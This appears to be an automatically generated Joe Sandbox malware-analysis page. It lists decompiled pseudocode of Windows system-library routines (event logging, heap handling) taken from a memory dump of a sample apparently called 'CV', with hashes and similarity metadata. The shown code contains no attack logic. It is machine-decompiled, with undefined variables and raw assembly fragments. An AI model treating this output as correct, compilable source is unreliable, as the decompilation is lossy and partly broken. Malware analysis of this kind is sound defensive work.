				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x133d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0128FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x267;
				if(E01267D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0128B640(E01289AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x012ffe3f
0x012ffe3f
0x012ffe4e
0x012ffe58
0x012ffe5d
0x012ffe5f
0x012ffe6a
0x012ffe72
0x012ffe75
0x012ffe78
0x012ffe83
0x012ffe95
0x012ffe85
0x012ffe8e
0x012ffe8e
0x012ffea0
0x012ffea1
0x012ffea3
0x012ffea8
0x012ffebd

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0f4a05f62d86599b988778ddbb4bce250f06b97da75bde109da03dc2ae4f5954
Instruction ID: 44511fe3d4fd6108fb0bc4a86c91107ef5f51e20e118a1c6c88b6fa24679d1b3
Opcode Fuzzy Hash: 0f4a05f62d86599b988778ddbb4bce250f06b97da75bde109da03dc2ae4f5954
Instruction Fuzzy Hash: 6F01D471E11209AFDB14EFA8D841FBEBBB8EF40B14F00406ABA00AB381DA70D900C794

Uniqueness

Uniqueness Score: -1.00%

Function 012FFEC0 Relevance: .0, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E012FFEC0(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				void* __edi;
				void* __esi;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_t24 = __ebx;
				_v12 =  *0x133d360 ^ _t32;
				_t30 = __edx;
				_t31 = __ecx;
				E0128FA60( &_v64, 0, 0x30);
				_v24 = _a4;
				_v32 = _t31;
				_v28 = _t30;
				_v58 = 0x266;
				if(E01267D50() == 0) {
					_t18 = 0x7ffe0388;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v64);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0128B640(E01289AE0(), _t24, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x012ffec0
0x012ffec0
0x012ffecf
0x012ffed9
0x012ffede
0x012ffee0
0x012ffeeb
0x012ffef3
0x012ffef6
0x012ffef9
0x012fff04
0x012fff16
0x012fff06
0x012fff0f
0x012fff0f
0x012fff21
0x012fff22
0x012fff24
0x012fff29
0x012fff3e

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b17c8a98aa2a521d7353b747632863a13eb037ab00cbcced05c4f0f37b0ddbd5
Instruction ID: afdfe9982e3c6f1fbfffcde3721257b4ca8f117c464661470a27217b2796e231
Opcode Fuzzy Hash: b17c8a98aa2a521d7353b747632863a13eb037ab00cbcced05c4f0f37b0ddbd5
Instruction Fuzzy Hash: AD01D471A11209AFDB14EBA8D845FBEBBB8EF44710F40406ABA00AB3D0DA70DA00C794

Uniqueness

Uniqueness Score: -1.00%

Function 01318A62 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01318A62(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed char* _t18;
				signed int _t32;

				_t29 = __edx;
				_v12 =  *0x133d360 ^ _t32;
				_t31 = _a8;
				_t30 = _a12;
				_v66 = 0x1c20;
				_v40 = __ecx;
				_v36 = __edx;
				_v32 = _a4;
				_v28 = _a8;
				_v24 = _a12;
				if(E01267D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0128B640(E01289AE0(), 0x1c20, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x01318a62
0x01318a71
0x01318a79
0x01318a82
0x01318a85
0x01318a89
0x01318a8c
0x01318a8f
0x01318a92
0x01318a95
0x01318a9f
0x01318ab1
0x01318aa1
0x01318aaa
0x01318aaa
0x01318abc
0x01318abd
0x01318abf
0x01318ac4
0x01318ada

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 29c74478241f0f5221f59fbd754d5132b2f867cae3777973f5cbc482af55e54b
Instruction ID: ebb88c6701cc8e57b8919ed19f41e09c5a1ceb2a0eb8cf94d010e92421f51778
Opcode Fuzzy Hash: 29c74478241f0f5221f59fbd754d5132b2f867cae3777973f5cbc482af55e54b
Instruction Fuzzy Hash: F5012C72A1121DAFDB04DFA9D9819EEBBB8EF58314F10405AF905E7391D734A900CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01318ED6 Relevance: .0, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E01318ED6(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				short _v62;
				char _v68;
				signed char* _t29;
				intOrPtr _t35;
				intOrPtr _t41;
				intOrPtr _t42;
				signed int _t43;

				_t40 = __edx;
				_v8 =  *0x133d360 ^ _t43;
				_v28 = __ecx;
				_v62 = 0x1c2a;
				_v36 =  *((intOrPtr*)(__edx + 0xc8));
				_v32 =  *((intOrPtr*)(__edx + 0xcc));
				_v20 =  *((intOrPtr*)(__edx + 0xd8));
				_v16 =  *((intOrPtr*)(__edx + 0xd4));
				_v24 = __edx;
				_v12 = ( *(__edx + 0xde) & 0x000000ff) >> 0x00000001 & 0x00000001;
				if(E01267D50() == 0) {
					_t29 = 0x7ffe0386;
				} else {
					_t29 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v68);
				_push(0x1c);
				_push(0x20402);
				_push( *_t29 & 0x000000ff);
				return E0128B640(E01289AE0(), _t35, _v8 ^ _t43, _t40, _t41, _t42);
			}

0x01318ed6
0x01318ee5
0x01318eed
0x01318ef0
0x01318efa
0x01318f03
0x01318f0c
0x01318f15
0x01318f24
0x01318f27
0x01318f31
0x01318f43
0x01318f33
0x01318f3c
0x01318f3c
0x01318f4e
0x01318f4f
0x01318f51
0x01318f56
0x01318f69

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6a32bb9f3bac02a53c1959d6f92a9e870fd7aadcee842eb8bffb12ee41907ee
Instruction ID: 8dc17ec215f400894a2a0a32b1d476cc22e6542efa97163cf3a9a167a03ea7b4
Opcode Fuzzy Hash: b6a32bb9f3bac02a53c1959d6f92a9e870fd7aadcee842eb8bffb12ee41907ee
Instruction Fuzzy Hash: 1D111E70A152199FDB04DFA8D441BAEFBF4FF08304F0442AAE519EB781E6349940CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0124DB60 Relevance: .0, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0124DB60(signed int __ecx) {
				intOrPtr* _t9;
				void* _t12;
				void* _t13;
				intOrPtr _t14;

				_t9 = __ecx;
				_t14 = 0;
				if(__ecx == 0 ||  *((intOrPtr*)(__ecx)) != 0) {
					_t13 = 0xc000000d;
				} else {
					_t14 = E0124DB40();
					if(_t14 == 0) {
						_t13 = 0xc0000017;
					} else {
						_t13 = E0124E7B0(__ecx, _t12, _t14, 0xfff);
						if(_t13 < 0) {
							L0124E8B0(__ecx, _t14, 0xfff);
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t14);
							_t14 = 0;
						} else {
							_t13 = 0;
							 *((intOrPtr*)(_t14 + 0xc)) =  *0x7ffe03a4;
						}
					}
				}
				 *_t9 = _t14;
				return _t13;
			}

0x0124db64
0x0124db66
0x0124db6b
0x0124dbaa
0x0124db71
0x0124db76
0x0124db7a
0x0124dba3
0x0124db7c
0x0124db87
0x0124db8b
0x012a4fa1
0x012a4fb3
0x012a4fb8
0x0124db91
0x0124db96
0x0124db98
0x0124db98
0x0124db8b
0x0124db7a
0x0124db9d
0x0124dba2

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction ID: c4fff6855d189df39ed1ac8f938e7fc1d6df7265d41355a8fef7c9fb460d8e2d
Opcode Fuzzy Hash: 4108fb18439822e7528065d03744c5b66e5752e741267b0d2dbc6e7ad13d6de1
Instruction Fuzzy Hash: CDF0FC332616279FE73A6AD94880F27B6999FF1A60F160035F3059B344D9A48C0286D0

Uniqueness

Uniqueness Score: -1.00%

Function 0124B1E1 Relevance: .0, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0124B1E1(intOrPtr __ecx, char __edx, char _a4, signed short* _a8) {
				signed char* _t13;
				intOrPtr _t22;
				char _t23;

				_t23 = __edx;
				_t22 = __ecx;
				if(E01267D50() != 0) {
					_t13 = ( *[fs:0x30])[0x50] + 0x22a;
				} else {
					_t13 = 0x7ffe0384;
				}
				if( *_t13 != 0) {
					_t13 =  *[fs:0x30];
					if((_t13[0x240] & 0x00000004) == 0) {
						goto L3;
					}
					if(E01267D50() == 0) {
						_t13 = 0x7ffe0385;
					} else {
						_t13 = ( *[fs:0x30])[0x50] + 0x22b;
					}
					if(( *_t13 & 0x00000020) == 0) {
						goto L3;
					}
					return E012C7016(0x14a4, _t22, _t23, _a4, _a8, 0);
				} else {
					L3:
					return _t13;
				}
			}

0x0124b1e8
0x0124b1ea
0x0124b1f3
0x012a4a17
0x0124b1f9
0x0124b1f9
0x0124b1f9
0x0124b201
0x012a4a21
0x012a4a2e
0x00000000
0x00000000
0x012a4a3b
0x012a4a4d
0x012a4a3d
0x012a4a46
0x012a4a46
0x012a4a55
0x00000000
0x00000000
0x00000000
0x0124b20a
0x0124b20a
0x0124b20a
0x0124b20a

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction ID: ea2e257e71b10b0e87ac766fb66198497631fa4546a14121a5cfc7434e11d6f3
Opcode Fuzzy Hash: d7c926d8f7ad5fed70f9c3145ab0d11368f8906714783f3796a50782a1b3489b
Instruction Fuzzy Hash: D701F4322306C19BE326A75DC814F69BB98EF91754F0C04A1FF148B6B2D7B8C840C715

Uniqueness

Uniqueness Score: -1.00%

Function 012DFE87 Relevance: .0, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E012DFE87(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_v8 =  *0x133d360 ^ _t35;
				_v16 = __ecx;
				_v54 = 0x1722;
				_v24 =  *(__ecx + 0x14) & 0x00ffffff;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				_v20 =  *((intOrPtr*)(__ecx + 0xc));
				if(E01267D50() == 0) {
					_t21 = 0x7ffe0382;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x228;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0128B640(E01289AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

0x012dfe96
0x012dfe9e
0x012dfea1
0x012dfead
0x012dfeb3
0x012dfeb9
0x012dfec3
0x012dfed5
0x012dfec5
0x012dfece
0x012dfece
0x012dfee0
0x012dfee1
0x012dfee3
0x012dfee8
0x012dfefb

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c35aa656837c2dc0251a4d8da936d24ed1d4e14044dc429427eff0eb974b375
Instruction ID: 10f85aa2c05e6b4d428295d5ab92c0411e74fa9d3f208559cb7d79a6d3c3dff8
Opcode Fuzzy Hash: 2c35aa656837c2dc0251a4d8da936d24ed1d4e14044dc429427eff0eb974b375
Instruction Fuzzy Hash: 37016271A10209AFCB14DFA8D542A6EB7F4EF14704F104159A505DB382D635D902CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0130131B Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E0130131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x133d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E01267D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E0128B640(E01289AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x0130131b
0x0130132a
0x01301330
0x01301336
0x0130133e
0x01301341
0x01301344
0x0130134f
0x01301361
0x01301351
0x0130135a
0x0130135a
0x0130136c
0x0130136d
0x0130136f
0x01301374
0x01301387

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2073f3676d93190fd09c8b8ba311aa5eace74922464a29977b762ed126ad2939
Instruction ID: e96018447fb89d0c415a69951a5dcce0127ffd8fef92dfe1b71ad592256c23e7
Opcode Fuzzy Hash: 2073f3676d93190fd09c8b8ba311aa5eace74922464a29977b762ed126ad2939
Instruction Fuzzy Hash: D001AF71A1120CAFCB40EFA8D545AAEB7F8FF18304F008099F805EB381E630DA00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 01318F6A Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E01318F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x133d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E01267D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E0128B640(E01289AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x01318f6a
0x01318f79
0x01318f81
0x01318f84
0x01318f8b
0x01318f91
0x01318f94
0x01318f9e
0x01318fb0
0x01318fa0
0x01318fa9
0x01318fa9
0x01318fbb
0x01318fbc
0x01318fbe
0x01318fc3
0x01318fd6

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74cdfeed7d54523edd5f288b2183eb57c074af2788a8ce0c4d5813f732dc6738
Instruction ID: 6c1dc36629b11881b6d6a8a90e388e138d3d1a7bcc3ed03c6c69fe584803d004
Opcode Fuzzy Hash: 74cdfeed7d54523edd5f288b2183eb57c074af2788a8ce0c4d5813f732dc6738
Instruction Fuzzy Hash: 63014474A1120DAFDB04EFA8D545AAEB7F8EF58304F504459B905EB380DB34DA00CB94

Uniqueness

Uniqueness Score: -1.00%

Function 01301608 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E01301608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x133d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E01267D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E0128B640(E01289AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}

0x01301608
0x01301617
0x0130161d
0x01301625
0x01301628
0x0130162b
0x01301636
0x01301648
0x01301638
0x01301641
0x01301641
0x01301653
0x01301654
0x01301656
0x0130165b
0x0130166e

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0584f01f402c108b0960a7efb1480f228c7f11bd0058a6378c7acf797f19cb4
Instruction ID: f19af4175a80ab0080a1c898af524b24b24858e4b02af5acd226886932c5eb04
Opcode Fuzzy Hash: a0584f01f402c108b0960a7efb1480f228c7f11bd0058a6378c7acf797f19cb4
Instruction Fuzzy Hash: 64F04971A1125CAFDB14EFA8D845AAEBBF8AF18304F444069A905EB291EA34D900CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0126C577 Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0126C577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E0126C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x12211cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E013188F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}

0x0126c577
0x0126c57d
0x0126c581
0x0126c5b5
0x0126c5b9
0x0126c5ce
0x0126c5ce
0x0126c5ca
0x00000000
0x0126c5ca
0x0126c5c4
0x0126c5c8
0x00000000
0x00000000
0x00000000
0x0126c5ad
0x00000000
0x0126c5af

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62dbc8f43da24e9cce90ed851e339be7c51a3a659db00b4678c9418fe87e16b7
Instruction ID: dd883390693a91b0c00822e44b7135266858a29eaeefddee819b1f7a9cd14979
Opcode Fuzzy Hash: 62dbc8f43da24e9cce90ed851e339be7c51a3a659db00b4678c9418fe87e16b7
Instruction Fuzzy Hash: C3F024F28312929FE736F31CE814B217FDC9B04230F44446BD685A31C2C2A0D8E0C250

Uniqueness

Uniqueness Score: -1.00%

Function 01318D34 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 43%

			E01318D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x133d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E01267D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E0128B640(E01289AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}

0x01318d34
0x01318d43
0x01318d4b
0x01318d4e
0x01318d52
0x01318d5c
0x01318d6e
0x01318d5e
0x01318d67
0x01318d67
0x01318d79
0x01318d7a
0x01318d7c
0x01318d81
0x01318d94

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 771bf205b3bb8eb48e6941afecdbd06cfd8cd779c126fce6c59b6488d121556c
Instruction ID: 47284c80b22273bbccab2a5c029a879921014c124eefd6a332d4f306dd0f9ade
Opcode Fuzzy Hash: 771bf205b3bb8eb48e6941afecdbd06cfd8cd779c126fce6c59b6488d121556c
Instruction Fuzzy Hash: 88F0B470A1470C9FDB14EFB8D441A7EB7B8EF14304F508099E905EB290DA34D900C754

Uniqueness

Uniqueness Score: -1.00%

Function 01302073 Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E01302073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E012FFD22(__ecx);
				_t19 =  *0x133849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1338748; // 0x0
					if(__eflags <= 0) {
						E01301C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1338724 & 0x00000004;
							if(( *0x1338724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1338724; // 0x0
					return E012F8DF1(__ebx, 0xc0000374, 0x1335890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}

0x01302076
0x01302078
0x0130207d
0x01302083
0x013020a4
0x013020aa
0x013020ac
0x013020b7
0x013020ba
0x013020bc
0x013020c9
0x013020c9
0x013020d0
0x013020d2
0x00000000
0x013020d2
0x013020be
0x013020c3
0x013020c5
0x013020c7
0x00000000
0x00000000
0x013020c7
0x013020bc
0x013020d4
0x01302085
0x01302085
0x013020a3
0x013020a3

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f82db37d1b287eb5075df21946c262a4bf310f5abd3e068e2b42aa9d64fa692
Instruction ID: b13600e281ffaa00bd4f3db5f040c0e60634351e853c58ca68d965fca7c99753
Opcode Fuzzy Hash: 5f82db37d1b287eb5075df21946c262a4bf310f5abd3e068e2b42aa9d64fa692
Instruction Fuzzy Hash: A9F0552B4252854ADF33EB3C35283E37FCADB95318F0A00C9E59017289C6348993CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0128927A Relevance: .0, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0128927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E0128FA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E012892C6(_t11, _t14);
				}
				return _t11;
			}

0x01289295
0x01289299
0x0128929f
0x012892aa
0x012892ad
0x012892ae
0x012892af
0x012892b0
0x012892b4
0x012892bb
0x012892bb
0x012892c5

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

